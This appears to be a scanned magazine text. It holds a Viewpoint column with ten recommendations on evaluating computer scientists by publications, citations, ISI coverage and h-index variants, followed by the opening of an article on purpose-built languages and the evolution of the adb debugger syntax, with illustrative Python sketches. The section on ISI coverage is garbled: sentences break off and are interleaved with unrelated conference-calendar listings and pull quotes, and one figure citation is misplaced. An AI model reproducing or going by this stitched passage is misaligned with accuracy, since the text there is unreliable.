Academic culture is changing. The rest of the world, including university management, increasingly assesses scientists; we must demonstrate worth through indicators, often numeric. While the extent of the syndrome varies with countries and institutions, La Fontaine’s words apply: “not everyone will die, but everyone is hit.” Tempting as it may be to reject numerical evaluation, it will not go away. The problem for computer scientists is that assessment relies on often inappropriate and occasionally outlandish criteria. We should at least try to base it on metrics acceptable to the profession.

In discussions with computer scientists from around the world, this risk of deciding careers through distorted instruments comes out as a top concern. In the U.S. it is mitigated by the influence of the Computing Research Association’s 1999 “best practices” report.ᵃ In many other countries, computer scientists must repeatedly explain the specificity of their discipline to colleagues from other areas, for example in hiring and promotion committees. Even in the U.S., the CRA report, which predates widespread use of citation databases and indexes, is no longer sufficient.


a For this and other references, and the source of the data behind the results, see an expanded version of this column at http://se.ethz.ch/~meyer/publications/cacm/research_evaluation.pdf.


Informatics Europe, the association of European CS departments,ᵇ has undertaken a study of the issue, of which this Viewpoint column is a preliminary result. Its views commit the authors only. For ease of use, the conclusions are summarized as 10 concrete recommendations.
Our focus is evaluation of individuals rather than departments or laboratories. The process often involves many criteria, whose importance varies with institutions: grants, number of Ph.D.s and where they went, community recognition such as keynotes at prestigious conferences, best paper and other awards, editorial board memberships. We mostly consider a particular criterion that always plays an important role: publications.


Research Evaluation

Research is a competitive endeavor. Researchers are accustomed to constant assessment: any work submitted—even, sometimes, invited—is peer-reviewed; rejection is frequent, even for senior scientists. Once published, a researcher’s work will be regularly assessed against that of others. Researchers themselves referee papers for publication, participate in promotion committees, evaluate proposals for funding agencies, and answer institutions’ requests for evaluation letters. The research management edifice relies on assessment of researchers by researchers. Criteria must be fair (to the extent possible for an activity circumscribed by the frailty of human judgment), openly specified, and accepted by the target scientific community. While other disciplines often participate in evaluations, it is not acceptable to impose criteria from one discipline on another.

b See http://www.informatics-europe.org.


Computer Science

Computer science concerns itself with the representation and processing of information using algorithmic techniques. (In Europe the more common term is Informatics, covering a slightly broader scope.) CS research includes two main flavors, not mutually exclusive: Theory, developing models of computations, programs, languages; Systems, building software artifacts and assessing their properties. In addition, domain-specific research addresses specifics of information and computing for particular application areas.

CS research often combines aspects of engineering and natural sciences as well as mathematics. This diversity is part of the discipline’s attraction, but also complicates evaluation.

Across these variants, CS research exhibits distinctive characteristics, captured by seminal concepts: algorithm, computability, complexity, specification/implementation duality, recursion, fixpoint, scale, function/data duality, static/dynamic duality, modeling, interaction... Not all scientists from other disciplines realize the existence of this corpus. Computer scientists are responsible for enforcing its role as a basis for evaluation:

1. Computer science is an original discipline combining science and engineering. Researcher evaluation must be adapted to its specificity.


The CS Publication Culture

In the computer science publication culture, prestigious conferences are a favorite tool for presenting original research—unlike disciplines where the prestige goes to journals and conferences are for raw initial results. Acceptance rates at selective CS conferences hover between 10% and 20%; in 2007-2008:

> ICSE (software engineering): 13%
> OOPSLA (object technology): 19%
> POPL (programming languages): 18%

Journals have their role, often to publish deeper versions of papers already presented at conferences. While many researchers use this opportunity, others have a successful career based largely on conference papers. It is important not to use journals as the only yardsticks for computer scientists.

Books, which some disciplines do not consider important scientific contributions, can be a primary vehicle in CS. Asked to name the most influential publication ever, many computer scientists will cite Knuth’s The Art of Computer Programming. Seminal concepts such as Design Patterns first became known through books.

2. A distinctive feature of CS publication is the importance of selective conferences and books. Journals do not necessarily carry more prestige.

Publications are not the only scientific contributions. Sometimes the best way to demonstrate value is through software or other artifacts. The Google success story involves a fixpoint algorithm: PageRank, which determines the popularity of a Web page from the links pointing to it, giving more weight to links that come from pages that are themselves popular. Before Google was commercial it was research, whose outcome included a paper on PageRank and the Google site. The site had—beyond its future commercial value—a research value that the paper could not convey: demonstrating scalability. Had the authors continued as researchers and come up for evaluation, the software would have been as significant as the paper.
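To make “fixpoint algorithm” concrete, here is a minimal Python sketch of PageRank as a power iteration. It is our illustration under stated assumptions, not Google’s implementation: it assumes the common textbook formulation with a damping factor of 0.85, spreads the rank held by pages without outgoing links evenly over all pages, and repeats the update until the ranks stop changing, that is, until they reach a fixpoint. The function name `pagerank`, its parameters, and the three-page example graph are hypothetical.

```python
from typing import Dict, List


def pagerank(links: Dict[str, List[str]], damping: float = 0.85,
             tol: float = 1e-10, max_iter: int = 1000) -> Dict[str, float]:
    """Power iteration for PageRank (textbook formulation, assumed here).

    links maps each page to the pages it links to. Each round computes, for
    every page p, (1 - d)/N plus d times the rank flowing in from pages that
    link to p, plus an even share of the rank held by pages with no outgoing
    links. Iteration stops when the ranks no longer change: a fixpoint.
    """
    pages = sorted(set(links) | {t for targets in links.values() for t in targets})
    n = len(pages)
    if n == 0:
        return {}
    rank = {p: 1.0 / n for p in pages}
    for _ in range(max_iter):
        # Pages with no outgoing links share their rank evenly with every page.
        dangling = sum(rank[p] for p in pages if not links.get(p))
        new = {p: (1.0 - damping) / n + damping * dangling / n for p in pages}
        for p in pages:
            targets = links.get(p, [])
            for t in targets:
                # A page passes on its rank, split equally among its outgoing links.
                new[t] += damping * rank[p] / len(targets)
        # Stop once one more round changes the ranks by a negligible amount.
        if sum(abs(new[p] - rank[p]) for p in pages) < tol:
            return new
        rank = new
    return rank


web = {"a": ["b", "c"], "b": ["c"], "c": ["a"]}
ranks = pagerank(web)
for page, score in sorted(ranks.items(), key=lambda kv: -kv[1]):
    print(page, round(score, 3))
```

In this small graph, pages a and b each receive exactly one incoming link, yet a ends up ranked well above b because its link comes from c, the most highly ranked page. Counting links alone would not separate them; that is why the computation has to iterate to a fixpoint rather than simply tally links.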

Assessing such contributions is delicate: a million downloads do not prove scientific value. Publication, with its peer review, provides more easily decodable evaluation grids. In assessing CS and especially Systems research, however, publications do not suffice:

3. To assess impact, artifacts such as software can be as important as publications.

Another issue is assessing individual contributions to multi-author work. Disciplines have different practices (maximum and average number of coauthors per article, 2007-2008):

> Nature over a year: maximum 22, average 7.3

> American Mathematical Monthly: maximum 6, average 2

> OOPSLA and POPL: maximum 7, average 2.7

Disciplines where many coauthors are the norm use elaborate name-ordering conventions to reflect individual contributions. This is not the standard culture in CS (except for such common practices as listing a Ph.D. student first in a joint paper with the advisor).

4. The order in which a CS publication lists authors is generally not significant. In the absence of specific indications, it should not serve as a factor in researcher evaluation.


Bibliometry

In assessment discussions, numbers typically beat no numbers; hence the temptation to reduce evaluations to such factors as publication counts, measuring output, and citation counts, measuring impact (and derived measures such as indexes, discussed next).

While numeric criteria trigger strong reactions,ᶜ alternatives have problems too: peer review is strongly dependent on evaluators’ choice and availability (the most competent are often the busiest), can be biased, and does not scale up. The solution is in combining techniques, subject to human interpretation:

5. Numerical measurements such as publication-related counts must never be used as the sole evaluation instrument. They must be filtered through human interpretation, particularly to avoid errors, and complemented by peer review and assessment of outputs other than publications.

Measures should not address volume but impact. Publication counts only assess activity. Giving them any other value encourages “write-only” journals, speakers-only conferences, and Stakhanovist research profiles favoring quantity over quality.

6. Publication counts are not adequate indicators of research value. They measure productivity, but neither impact nor quality.

Citation counts assess impact. They rely on databases such as ISI, CiteSeer, ACM Digital Library, Google Scholar. They, too, have limitations:

> Focus. Publication quality is just one aspect of research quality, impact one aspect of publication quality, citations one aspect of impact.

> Identity. Misspellings and mangling of authors’ names lose citations. Names with special characters are particularly at risk. If your name is Krötenfänger, do not expect your publications to be counted correctly.

> Distortions. Article introductions heavily cite surveys. The milestone article that introduced NP-completeness has far fewer citations than a later tutorial.

> Misinterpretation. Citation may imply criticism rather than appreciation. Many program verification articles cite a famous protocol paper—to show that their tools catch an equally famous error in the protocol.

> Time. Citation counts favor older contributions.

> Size. Citation counts are absolute; impact is relative to each community’s size.

> Networking. Authors form mutual citation societies.

> Bias. Some authors hope (unethically) to maximize chances of acceptance by citing program committee members.

c D. Parnas, “Stop the Numbers Game,” Commun. ACM 50, 11 (Nov. 2007), 19-21; available at http://tinyurl.com/2z652a. Parnas mostly discusses counting publications, but deals briefly with citation counts.

The last two examples illustrate the occasionally perverse effects of assessment techniques on research work itself.
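The Identity problem in the list of citation-count limitations is easy to reproduce. In the Python sketch below (our illustration, not the method of any particular citation database), one surname with umlauts is rendered in four plausible ways. A database that keys citations on the exact author string would split that author’s citations across four entries, and simple accent stripping merges only two of them. The helper names and the author are hypothetical; `unicodedata.normalize`, `unicodedata.combining`, and `str.maketrans` are standard Python.

```python
import unicodedata


def strip_accents(name: str) -> str:
    """Decompose characters (NFKD) and drop combining marks, so 'ö' becomes 'o'."""
    decomposed = unicodedata.normalize("NFKD", name)
    return "".join(ch for ch in decomposed if not unicodedata.combining(ch))


def german_transliteration(name: str) -> str:
    """Spell umlauts the German way, as a typesetter without special characters might."""
    table = str.maketrans({"ä": "ae", "ö": "oe", "ü": "ue",
                           "Ä": "Ae", "Ö": "Oe", "Ü": "Ue", "ß": "ss"})
    return name.translate(table)


AUTHOR = "Krötenfänger"  # hypothetical author used for illustration

# Four renderings of the same name that might appear in citing papers.
variants = [
    AUTHOR,                                             # as the author writes it
    strip_accents(AUTHOR),                              # accents stripped
    german_transliteration(AUTHOR),                     # German-style transliteration
    AUTHOR.encode("ascii", "ignore").decode("ascii"),   # non-ASCII letters silently dropped
]

exact_keys = set(variants)                           # keying on the raw string
folded_keys = {strip_accents(v) for v in variants}   # keying on the accent-stripped string

print(sorted(exact_keys))
print(len(exact_keys), "distinct exact keys;", len(folded_keys), "after accent stripping")
```

Here `exact_keys` has four entries and `folded_keys` still has three: normalization cannot recover a letter that was dropped, nor guess that “oe” and “ö” are the same, which is why the column calls for error-reporting mechanisms rather than trusting automated matching.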

The most serious problem is data quality; no process can be better than its data. Transparency is essential, as well as error-reporting mechanisms and prompt response (as with ACM and DBLP):

7. Any evaluation criterion, especially quantitative, must be based on clear, published criteria.

This remains wishful thinking for major databases. The methods by which Google Scholar and ISI select documents and citations are not published or subject to debate.

Publication patterns vary across disciplines, reinforcing the comment that we should not judge one by the rules of another:

8. Numerical indicators must not serve for comparisons across disciplines.

This rule also applies to the issue (not otherwise addressed here) of evaluating laboratories or departments rather than individuals.


CS Coverage in Major Databases 
An issue of concern to computer sci- 


entists is the tendency to use publica- 
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The 18th International World 
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edu.pe 


April 26-30 


_ International Conference on the 
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Email: ejw@cs.ucsc.edu 
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Email: Diana@cs.sfu.ca 


| May5-8 
14th International Conference 
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_ and Digital Media, 


Stuttgard, Germany, 
Contact: Thomas Haegele, 
Email: thomas. haegele@ 
filmakademie.de 


May 10-13 
ACM 2009 International 
Conference on Supporting 
Group Work, 

Sanibel Island, FL, 
Sponsored: SIGCHI, 
Contact: Erling Carl Havn, 
Email: havn@man.dtu.dk 
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putes these indexes from Google Schol- 
ar data. Such indexes cannot be more 
credible than the underlying databas- 
es; results should always be checked 
manually for context and possible dis- 


tion databases that do not adequately 
cover CS, such as Thomson Scientific’s 
ISI Web of Science. 

The principal problem is what ISI 
counts. Many CS conferences and most 


Our focus is 
evaluation of 
individuals rather 


books are not listed; conversely, some 
publications are included indiscrimi- 
nately. The results make computer 
scientists cringe.* Niklaus Wirth, Tur- 
ing Award winner, appears for minor 
papers from indexed publications, 
not his seminal 1970 Pascal report. 
Knuth’s milestone book series, with an 
astounding 15,000 citations in Google 
Scholar, does not figure. Neither do 
Knuth’s three articles most frequently 
cited according to Google. 

Evidence of ISI’s shortcomings for 
CS is “internal coverage”: the percent- 
age of citations of a publication in the 


same database. ISI’s internal cover- | 


age, over 80% for physics or chemistry, 
is only 38% for CS. 

Another example is Springer’s Lec- 
ture Notes in Computer Science, which 
ISI classified until 2006 as a journal. 
A great resource, LNCS provides fast 
publication of conference proceed- 
ings and reports. Lumping all into a 
single “journal” category was absurd, 
especially since ISI omits top non- 
LNCS conferences: 

> The International Conference on 


Software Engineering (ICSE), the top | 


conference in a field that has its own 
ISI category, is not indexed. 

>» An LNCS-published workshop at 
ICSE, where authors would typically 
try out ideas not yet ready for ICSE 
submission, was indexed. 

ISI indexes SIGPLAN Notices, an 


unrefereed publication devoting or-— 


dinary issues to notes and letters and 
special issues to proceedings of such 
conferences as POPL. POPL papers ap- 


pear in ISI—on the same footing as a | 


reader’s note in a regular issue. 

The database has little understand- 
ing of CS. Its 50 most cited CS refer- 
ences include “Chemometrics in food 
science,” from a “Chemometrics and 
Intelligent Laboratory Systems” jour- 
nal. Many CS entries are not recogniz- 
able as milestone contributions. The 
cruelest comparison is with CiteSeer, 


whose Most Cited list includes many | 


publications familiar to all computer 
scientists; it has not a single entry in 


d_ AILISI searches as of mid-2008. 
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/ common with the ISI list. 


than departments 
or laboratories. 


ISI’s “highly cited researchers” list 
includes many prestigious computer 
scientists but leaves out such iconic 
names as Wirth, Parnas, Knuth and all 
the 10 2000-2006 Turing Award winners 
except one. Since ISI’s process provides 
noclearrole forcommunity assessment, 
the situation is unlikely to improve. 

The inevitable deficiencies of alter- 
natives pale in consideration: 

9. In assessing publications and cita- 


tions, ISI Web of Science is inadequate for — 


most of CS and must not be used. Alterna- 
tives include Google Scholar, CiteSeer, 
and (potentially) ACM’s Digital Library. 
Anyone in charge of assessment 
should know that attempts to use ISI 
for CS will cause massive opposition 
and may lead to outright rejection 
of any numerical criteria, including 


- more reasonable ones. 


Assessment Formulae 
A recent trend is to rely on numerical measures of impact, derived from citation databases, especially the h-index: the highest n such that C(n) ≥ n, where C(n) is the citation count of the author’s n-th most cited publication. Variants exist:

> The individual h-index divides the h-index by the average number of authors of the publications that count toward it, better reflecting individual contributions.

> The g-index, the highest n such that the top n publications received (together) at least n² citations, corrects another h-index deficiency: not recognizing extremely influential publications. (If your second most cited work has 100 citations, the h-index does not care whether the first has 101 or 15,000.)
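The three formulas are short enough to compute directly. The following is a minimal Python sketch that assumes each publication is represented only by its citation count. For the individual variant, it also needs the publication's author count. The individual h-index here uses one common normalization: h divided by the mean number of authors of the h most cited papers. Other normalizations exist. The sample data are invented to reproduce the 101-versus-15,000 point above.

```python
from typing import Sequence


def h_index(citations: Sequence[int]) -> int:
    """Highest n such that the n-th most cited publication has at least n citations."""
    h = 0
    for n, c in enumerate(sorted(citations, reverse=True), start=1):
        if c < n:
            break
        h = n
    return h


def g_index(citations: Sequence[int]) -> int:
    """Highest n such that the top n publications together have at least n**2 citations."""
    g, total = 0, 0
    for n, c in enumerate(sorted(citations, reverse=True), start=1):
        total += c
        if total >= n * n:
            g = n
    return g


def individual_h_index(citations: Sequence[int], authors: Sequence[int]) -> float:
    """h divided by the mean author count of the h most cited publications (one convention)."""
    h = h_index(citations)
    if h == 0:
        return 0.0
    ranked = sorted(zip(citations, authors), key=lambda p: p[0], reverse=True)
    mean_authors = sum(a for _, a in ranked[:h]) / h
    return h / mean_authors


# Invented data: identical h, very different g.
modest = [101, 100] + [0] * 200
stellar = [15_000, 100] + [0] * 200
print(h_index(modest), h_index(stellar))  # 2 2
print(g_index(modest), g_index(stellar))  # 14 122
```

The g-index loop deliberately does not stop at the first failure. It records the largest n that satisfies the condition. Note that g can never exceed the number of publications listed.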

The “Publish or Perish” site[e] com-

[e] See http://www.harzing.com/resources.htm#/pop.htm.

tortions. It would be as counterproductive to reject these techniques as to use them blindly to get definitive researcher assessments. There is no substitute for a careful process involving complementary sources such as peer review.


Assessing Assessment 
Scientists are taught rigor: submit any hypothesis to scrutiny, any experiment to duplication, any theorem to independent proof. They naturally assume that processes affecting their careers will be subjected to similar standards. Just as they do not expect, in arguing with a Ph.D. student, to impose a scientifically flawed view on the sole basis of seniority, so will they not let management impose a flawed evaluation mechanism on the sole basis of authority:

10. Assessment criteria must themselves undergo assessment and revision.

Openness and self-improvement are the price to pay to ensure a successful process, endorsed by the community. This observation is representative of our more general conclusion. Negative reactions to new assessment techniques deserve consideration. They are not rejections of assessment per se but calls for a professional, rational approach. The bad news is that there is no easy formula; no tool will deliver a magic number defining the measure of a researcher. The good news is that we have ever more instruments at our disposal, which taken together can help form a truthful picture of CS research effectiveness. Their use should undergo the same scrutiny that we apply to our work as scientists.
Purpose-Built Languages

The ecosystem of purpose-built languages is a key part of systems development.

BY MIKE SHAPIRO
sprout like weeds alongside the road of mainstream language development, and they exhibit properties and a history that lead one to reconsider instinctive answers to the fundamental language questions. When one considers purpose-built languages, programming language development is not converging at all, and utility seems to have little to do with traditional notions of structure or properties that are empirically “better” from a language-design perspective. Purpose-built languages even defy a strict definition worthy of a prescriptive compiler grammarian: they somehow seem “smaller” than a full-fledged programming language; they are not always Turing-complete; they can lack formal grammars (and parsers); they are sometimes stand-alone but often a part of a more complex environment or containing program; they are often but not always interpreted; they are typically designed for a single purpose but often (accidentally) jump from one type of use to another. And some are even nameless.

Most significantly, purpose-built 
languages have often formed an es- 
sential part of the development of 
larger software systems such as oper- 
ating systems, whether as a part of de- 
veloper tools or as glue between dis- 
tinct pieces of a larger environment. 
So it is particularly interesting to un- 
earth some of these lesser-known cre- 
ations and look at their connections 
to our larger language insights. In my 
career, while working on several com- 
mercial operating systems and large 
software components, I have come 
to conclude that not only are new 
languages developing all the time, 
but they are also often integral to the 
growth and maintenance of larger- 
scale software systems. 

The Unix environment, with its philosophy of little tools that can be easily connected, was an ideal greenhouse for the growth of purpose-built languages. A cursory scan of Unix manuals from the early 1980s shows more than 20 little languages of various forms in active use, as shown in Figure 1.

Figure 1: Little languages in Unix, early 1980s.

Debuggers: adb, dbx, stabs
Shells/Utilities: sh, csh, awk, bc, dc, ed, ex, vi, sed
Text Formatting: eqn, pic, nroff, troff
Programming Tools: lex, make, m4, ratfor, yacc
Games: rogue, trek
Libraries: regex
Configuration: sendmail.cf

Figure 2: ODT-8 debugger syntax, circa 1967.

These languages vary from complete programming languages (sh) to preprocessors (yacc) to command-line syntax (adb) to representations of state machines or data structures (regular expressions, debugger “stabs”). Twenty years later, when Sun Microsystems released the modern Unix system Solaris 10, almost all of the new significant operating-system features involved the introduction of new purpose-built languages: the DTrace debugging software introduced the D language for tracing queries; the Fault Management system included a language for describing fault propagations; the Zones and Service Management features included XML configuration grammars and new command-line interpreters.

The history of one of these little Unix languages, that of the adb debugger, is particularly illustrative of the accidental evolution and stickiness of something small but useful in a larger system.

Evolution Trumps Intelligent Design

The early development of Unix occurred on DEC PDP systems, which had a very simple debugger available known as ODT, or Octal Debugging Technique. (This terrific name conjures thoughts of a secret kung fu maneuver used to render the PDP’s 12-bit registers paralyzed.) The ODT program supported an incredibly primitive syntax: an octal physical memory address was specified at the start of each command and suffixed with a single character (say, B for breakpoint) or a slash (/) to read and optionally to write the content of that memory location, as shown in Figure 2.

Thus, a little language was born. The ODT syntax clearly inspired the form of the first debugger for the new Unix system being developed on the PDP, which was simply called db. At the time of Unix v3 in 1971, the db command syntax borrowed the basic ODT model and began extending it with additional character suffixes to define addressing modes and formatting options, as shown in Figure 3.
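The examine/deposit/breakpoint grammar in Figure 2 is small enough to model in a few lines. The following is a hypothetical Python toy, not ODT's or db's actual implementation. It assumes that a command is an octal address followed either by B (set a breakpoint) or by a slash with an optional new octal value to deposit. It also assumes a terse "?" reply for anything it cannot parse.

```python
import re

# Hypothetical grammar: octal address, then "B", or "/" plus an optional octal value.
COMMAND = re.compile(r"([0-7]+)\s*(?:(B)|/\s*([0-7]*))")


class ToyODT:
    """A toy examine/deposit/breakpoint loop in the spirit of Figure 2."""

    def __init__(self) -> None:
        self.memory: dict[int, int] = {}
        self.breakpoints: set[int] = set()

    def execute(self, line: str) -> str:
        match = COMMAND.fullmatch(line.strip())
        if match is None:
            return "?"  # assumed terse error reply
        address = int(match.group(1), 8)
        if match.group(2) == "B":
            self.breakpoints.add(address)
            return ""
        old = self.memory.get(address, 0)
        if match.group(3):  # a new value was typed after the slash: deposit it
            self.memory[address] = int(match.group(3), 8)
        return format(old, "o")  # echo the previous content in octal


odt = ToyODT()
odt.memory[0o400] = 0o6046
print(odt.execute("400/"))       # 6046
print(odt.execute("400/ 2345"))  # 6046 (the old value); 2345 is now stored
print(odt.execute("3000B"))      # prints an empty line; breakpoint recorded
```

The whole "language" is one regular expression. That matches the point that these notations grew out of the task rather than out of a grammar.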

By 1980, db had been replaced by adb, which was included with the AT&T SVR3 Unix distribution. The syntax had evolved to add new debugging commands over the intervening years and now supported not just simple addresses but arithmetic expressions (123+456/ was now legal). Also, a character after “/” now indicated a data format, and a character after “$” or “:” now indicated an action. The adb syntax is shown in Figure 4.
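The split between a leading expression and a one-character verb with its modifier can be sketched as a tiny parser. This is a hypothetical illustration, not adb's code. It assumes decimal integers joined only by + and -, whereas adb had its own radix conventions and a much richer expression language. It also treats anything after the modifier, such as a file name after "$<", as a plain argument.

```python
import re
from typing import NamedTuple, Optional

EXPR = re.compile(r"\s*\d+(?:\s*[+-]\s*\d+)*\s*")
TERM = re.compile(r"([+-]?)\s*(\d+)")
VERB = re.compile(r"[/$:]")


class Command(NamedTuple):
    address: Optional[int]  # value of the leading expression, if any
    verb: str               # "/" (examine), "$" or ":" (action)
    modifier: str           # format character after "/", action character otherwise
    argument: str           # anything left over, e.g. a file name after "$<"


def eval_expr(text: str) -> Optional[int]:
    """Evaluate decimal terms joined by + and - (a toy subset of adb expressions)."""
    if not text.strip():
        return None
    if EXPR.fullmatch(text) is None:
        raise ValueError(f"bad expression: {text!r}")
    return sum(-int(d) if sign == "-" else int(d) for sign, d in TERM.findall(text))


def parse(line: str) -> Command:
    verb = VERB.search(line)
    if verb is None or verb.end() >= len(line):
        raise ValueError(f"missing verb or modifier: {line!r}")
    return Command(
        address=eval_expr(line[: verb.start()]),
        verb=verb.group(),
        modifier=line[verb.end()],
        argument=line[verb.end() + 1 :].strip(),
    )


print(parse("123+456/x"))  # Command(address=579, verb='/', modifier='x', argument='')
```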

400/             display the content of memory location 400
400/ 6046        observe the value is 6046 at that location
400/ 6046 2345   rewrite the value to 2345
3000B            set a breakpoint at 3000

ODT-8 Octal Debugging Technique Manual, DEC-D8-COCO-D, Dec. 1967.

Figure 3: Unix V3 “db” syntax, circa 1971.

address /   Print a word in octal
address \   Print a byte in octal
address ~   Print a byte in ASCII
address ?   Disassemble an instruction
$           Print the machine registers

Unix Version 3 Manual Pages, DB(1), Nov. 3, 1971.

Figure 4: AT&T SVR3 “adb” syntax, circa 1980.

expression /o   Print a two-byte integer in octal at the specified address
expression /x   Print a two-byte integer in hexadecimal at the specified address
expression /d   Print a two-byte integer in decimal at the specified address
$a              Print an Algol stack backtrace
$c              Print a C stack backtrace
$r              Print the machine registers
expression :b   Set a breakpoint
$< filename     Read and execute the commands found in the specified file

Figure 6 source: Kernighan, B. Ratfor: A preprocessor for a Rational Fortran. Software: Practice and Experience. Oct. 1975.

The addition of “$<” to read an external file of commands was particularly interesting, because it spawned the development of primitive adb programs or macros that executed a series of commands to display the contents of a C data structure at a particular memory address. That is, to display a kernel proc structure, you would take its address and then type “$<proc” to execute a predefined series of commands to display each member of the C data structure for a process. The content of the proc macro in SunOS 4 from 1984 is shown in Figure 5. To make this output understandable, the “/” command could now be suffixed with quoted string labels, newlines (n), and tabs (16t) to be included among the decoded data.

The “.” variable evaluates to the input address used when applying the macro, and the “+” variable evaluates to that input address incremented by the byte count of all preceding format characters. The macros were then maintained with the kernel source code.
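The “.” and “+” rules amount to a running byte counter over the macro's format strings. The sketch below assumes a hypothetical size table:

- b and c are 1 byte.
- Lowercase o, d and x are 2 bytes, as in Figure 4.
- Uppercase O, D and X are 4 bytes.

Quoted labels, the newline directive n, and tab directives such as 16t are treated as consuming no target memory. Real adb supported many more format characters, so this is an illustration of the rule, not adb's implementation.

```python
import re

# Assumed byte sizes per format character (hypothetical table; adb had more).
SIZES = {"b": 1, "c": 1, "o": 2, "d": 2, "x": 2, "O": 4, "D": 4, "X": 4}
# Quoted label | tab directive like 16t | newline n | optional repeat count + format char
DIRECTIVE = re.compile(r'"[^"]*"|\d+t|n|(\d*)([A-Za-z])')


def format_bytes(fmt: str) -> int:
    """Bytes of target memory consumed by one format string."""
    total = 0
    for m in DIRECTIVE.finditer(fmt):
        count, char = m.group(1), m.group(2)
        if char is None:  # label, tab, or newline: printed, but reads no data
            continue
        total += int(count or "1") * SIZES[char]
    return total


def macro_addresses(lines: list[str], start: int) -> list[int]:
    """Address each "./fmt" or "+/fmt" line applies to, per the "." and "+" rules."""
    addresses, consumed = [], 0
    for line in lines:
        anchor, sep, fmt = line.partition("/")
        if not sep or anchor not in (".", "+"):
            raise ValueError(f"unsupported macro line: {line!r}")
        addresses.append(start if anchor == "." else start + consumed)
        consumed += format_bytes(fmt)
    return addresses


figure5_head = [
    './"link"16t"rlink"16t"nxt"16t"prev"nXXXX',
    '+/"as"16t"segu"16t"stack"16t"uarea"nXXXX',
    '+/"upri"8t"pri"8t"cpu"8t"stat"8t"time"8t"nice"nbbbbbb',
]
print([hex(a) for a in macro_addresses(figure5_head, 0x1000)])  # ['0x1000', '0x1010', '0x1020']
```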

More than a decade later, in 1997, I was working at Sun on what would become Solaris 7. This release was our first 64-bit kernel, but the kernel-debugging tool of choice was still adb, just as it was in 1984, and our source base now contained hundreds of useful macro files. Unfortunately, the implementation of adb was essentially impossible to port cleanly from 32-bit to 64-bit to debug the new kernel, so it seemed the time was ripe for the development of a new clean code base with many more modern debugger features.

As I considered how best to approach the problem, I was struck by the fact that despite its brittle, unstructured code base, the key feature of adb was that its syntax was imbued deeply in the minds and behaviors of all of our most experienced and effective engineers. (As someone aptly put it at the time: “It’s in the fingers.”) So I set out to build a new modular debugger (mdb) that would support an API for advanced kernel debugging and other modern features, yet would remain precisely backward-compatible with existing syntax and macros. Sophisticated new features were added after a new prefix (“::”) so they would not break the existing syntax (for example, “::findleaks” to check for kernel memory leaks). The entire syntax was at last properly encoded as a yacc parser. Macro files were phased out in favor of compiler-generated debug information, but the “$<” syntax was left as an alias. Another decade later, mdb remains the standard tool for postmortem debugging of the OpenSolaris kernel and has been extended by hundreds of programmers.
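Reserving a new prefix is a simple way to grow a command language without breaking old habits. The sketch below models that idea as a dispatcher:

- Lines containing “::” go to a table of newly registered commands.
- Every other line falls through, unchanged, to a legacy handler for adb syntax.

The names Dispatcher, register and the handler signature are hypothetical and are not mdb's actual module API.

```python
from typing import Callable, Dict, Optional

Handler = Callable[[Optional[str], str], str]


class Dispatcher:
    """Route "::name" commands to new handlers; leave legacy adb syntax untouched."""

    def __init__(self, legacy: Callable[[str], str]) -> None:
        self.legacy = legacy
        self.commands: Dict[str, Handler] = {}

    def register(self, name: str, handler: Handler) -> None:
        self.commands[name] = handler

    def run(self, line: str) -> str:
        address, sep, rest = line.partition("::")
        if not sep:
            return self.legacy(line)  # no "::" prefix: old syntax, old behavior
        name, _, args = rest.strip().partition(" ")
        handler = self.commands.get(name)
        if handler is None:
            return f"{name}: unknown command"
        return handler(address.strip() or None, args.strip())


mdb = Dispatcher(legacy=lambda line: f"legacy adb: {line}")
mdb.register("findleaks", lambda addr, args: "scanning for leaks")
print(mdb.run("::findleaks"))  # scanning for leaks
print(mdb.run("400/x"))        # legacy adb: 400/x
```

The design choice is that the old path is the default. Nothing an experienced user already types changes meaning.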

The debugger tale illustrates that a little purpose-built language can evolve essentially at random, have no clear design, no consistent grammar or parser, and no name, and yet endure and grow in shipping operating systems for more than 40 years. In the same time period, many mainstream languages came and went into the great beyond (Algol, Ada, Pascal, Cobol, and so on). Fundamentally, this debugger has survived for one reason: it concisely encoded the exact task its users performed and thereby connected to those users. Take an address, dump out its content, find the next address, follow it to the next location of interest, dump out its content, and so on. For purpose-built languages, a deep connection to a task and the user community for that task is often worth more than clever design or elegant syntax.

Figure 5: Debugging the “proc” structure on SunOS 4, circa 1984.

address $<proc

./"link"16t"rlink"16t"nxt"16t"prev"nXXXX
+/"as"16t"segu"16t"stack"16t"uarea"nXXXX
+/"upri"8t"pri"8t"cpu"8t"stat"8t"time"8t"nice"nbbbbbb
+/"slp"8t"cursig"16t"sig"bbX
+/"mask"16t"ignore"16t"catch"nXXX
+/"flag"16t"uid"8t"suid"8t"pgrp"nxddd
+/"pid"8t"ppid"8t"xstat"8t"ticks"nddxd
+/"cred"16t"ru"16t"tsize"nXxXX
+/"dsize"16t"ssize"16t"rssize"nXXX
+/"Maxrss"16t"swrss"16t"wchan"nXXX
+/16+"Scpu"16t"pptr"16t"tptr"nXXX
+/"real itimer"n4D
+/"idhash"16t"swlocks"ndd
+/"aio forw"16t"aio back"8t"aio count"8t"threadcnt"nXxxX

Figure 6: Fortran and Ratfor, circa 1975.

Fortran:
      if (a .gt. b) goto 10
      sw = 0
      write(6, 1) a, b
      goto 20
   10 sw = 1
      write(6, 1) b, a
   20

Ratfor:
      if (a <= b) {
         sw = 0
         write(6, 1) a, b
         }
      else {
         sw = 1
         write(6, 1) b, a
         }

Figure 7: C and Algol mutant from early “adb”.

#define IF    if(
#define THEN  ){
#define ELSE  } else {
#define FI    ;}
#define ANDF  &&

localsym(cframe)
L_INT cframe;
{
    INT symflg;
    WHILE nextsym() ANDF localok
        ANDF symbol.symc[0]!='~'
        ANDF (symflg=symbol.symf)!=037
    DO IF symflg>=2 ANDF symflg<=4
       THEN localval=symbol.symv;
            return(TRUE);
       ELIF symflg==1
       THEN localval=leng(shorten(cframe)+symbol.symv);
            return(TRUE);
       ELIF symflg==20 ANDF lastframe
       THEN localval=leng(lastframe+2*symbol.symv-10);
            return(TRUE);
       FI
    OD
    return(FALSE);
}


Mutation and Hybridization 

Mutation, some accidental and some intentional, often plays a critical role in the development of purpose-built systems languages. One common form of mutation involves adding a subset of the syntax of one language (for example, expressions or regular expressions) to another language. This type of mutation can be implemented using a preprocessor that converts one high-level form to another or intermingles preprocessed syntax with the target syntax of a destination language. Mutations may diverge far enough that a new hybrid language is formed. The parser tools yacc and bison are the best-known examples of a complete hybrid language: a grammar is declared as a set of parsing rules intermingled with C code that is executed in response to the rules; the utilities then emit a finished C program that includes the rule code and the code to execute a parsing state machine on the grammar.

